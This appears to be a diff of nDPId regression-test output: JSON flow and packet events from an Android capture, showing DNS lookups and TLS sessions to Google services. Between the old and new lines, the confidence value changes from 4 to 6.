{"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} -02356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454867688,"flow_last_seen":1582454867789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3887,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1582454867789,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}} 
+00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867723,"flow_last_seen":1582454867761,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454867761,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.74"}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454867688,"flow_last_seen":1582454867788,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1582454867788,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} 
+02356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454867688,"flow_last_seen":1582454867789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3887,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1582454867789,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"c
60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868348,"flow_last_seen":1582454868348,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868348,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1582454868348,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868348,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8A3VAAEAGs2vAqAIQrNkUSs0GAbvbqzdvAAAAAKAC\/\/+uLAAAAgQFtAQCCAr\/\/zQaAAAAAAEDAwg="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1582454868386,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868386,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8PjQAAHUGg6ys2RRKwKgCEAG7zQbWjo3E26s3cKAS6yAJ1AAAAgQFZAQCCAq9hJee\/\/80GgEDAwg="} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1582454868386,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868386,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0A3ZAAEAGs3LAqAIQrNkUSs0GAbvbqzdw1o6NxYAQAVciEQAAAQEICv\/\/NCS9hJee"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868348,"flow_last_seen":1582454868424,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454868424,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868348,"flow_last_seen":1582454868424,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454868424,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868462,"flow_last_seen":1582454868462,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1582454868462,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1582454868462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1582454868462,"pkt":"xiwDYGpkTGr2n\/YnCABFAABLqjFAAEARCw\/AqAIQwKgCAbfpADUAN\/8RnJ4BAAABAAAAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2dzdGF0aWMDY29tAAABAAE="} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868462,"flow_last_seen":1582454868462,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1582454868462,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01590{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3177,"flow_avg_l4_payload_len":397,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","server_names":"*.storage.googleapis.com,*.appspot.com.storage.googleapis.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.googleapis.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.select.googleapis.com,commondatastorage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.storage.googleapis.com","alpn":"http\/1.1","fingerprint":"BA:BA:BA:55:69:9F:E0:BD:48:80:23:A4:B3:AD:C1:FF:EA:4E:17:C9"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868462,"flow_last_seen":1582454868462,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1582454868462,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01590{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3177,"flow_avg_l4_payload_len":397,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","server_names":"*.storage.googleapis.com,*.appspot.com.storage.googleapis.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.googleapis.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.select.googleapis.com,commondatastorage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.storage.googleapis.com","alpn":"http\/1.1","fingerprint":"BA:BA:BA:55:69:9F:E0:BD:48:80:23:A4:B3:AD:C1:FF:EA:4E:17:C9"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1582454868503,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1582454868503,"pkt":"TGr2n\/YnxiwDYGpkCABFAABbmZAAAEARW6DAqAIBwKgCEAA1t+kAR93wnJ6BgAABAAEAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2dzdGF0aWMDY29tAAABAAHADAABAAEAAACxAASs2RID"} 
-00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454868462,"flow_last_seen":1582454868503,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1582454868503,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.gstatic.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.18.3"}} +00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454868462,"flow_last_seen":1582454868503,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1582454868503,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.gstatic.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.18.3"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868511,"flow_last_seen":1582454868511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868511,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1582454868511,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868511,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8PG9AAEAGfLjAqAIQrNkSA5AYAbuCdQgsAAAAAKAC\/\/91sgAAAgQFtAQCCAr\/\/zRDAAAAAAEDAwg="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868527,"flow_last_seen":1582454868527,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868527,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1582454868527,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868527,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8stVAAEAGBlLAqAIQrNkSA5AaAbtdpoaTAAAAAKAC\/\/8cFQAAAgQFtAQCCAr\/\/zRGAAAAAAEDAwg="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1582454868559,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868559,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8mn0AAHYGKKqs2RIDwKgCEAG7kBpu4mZiXaaGlKAS6yC\/LgAAAgQFZAQCCApPRk15\/\/80RgEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1582454868563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868563,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0stZAAEAGBlnAqAIQrNkSA5AaAbtdpoaUbuJmY4AQAVfXbAAAAQEICv\/\/NE9PRk15"} 
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868527,"flow_last_seen":1582454868563,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868563,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868527,"flow_last_seen":1582454868563,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868563,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1582454868597,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454868597,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBqkFAAEARCwnAqAIQwKgCAcjmADUALYwU2tsBAAABAAAAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAQ=="} 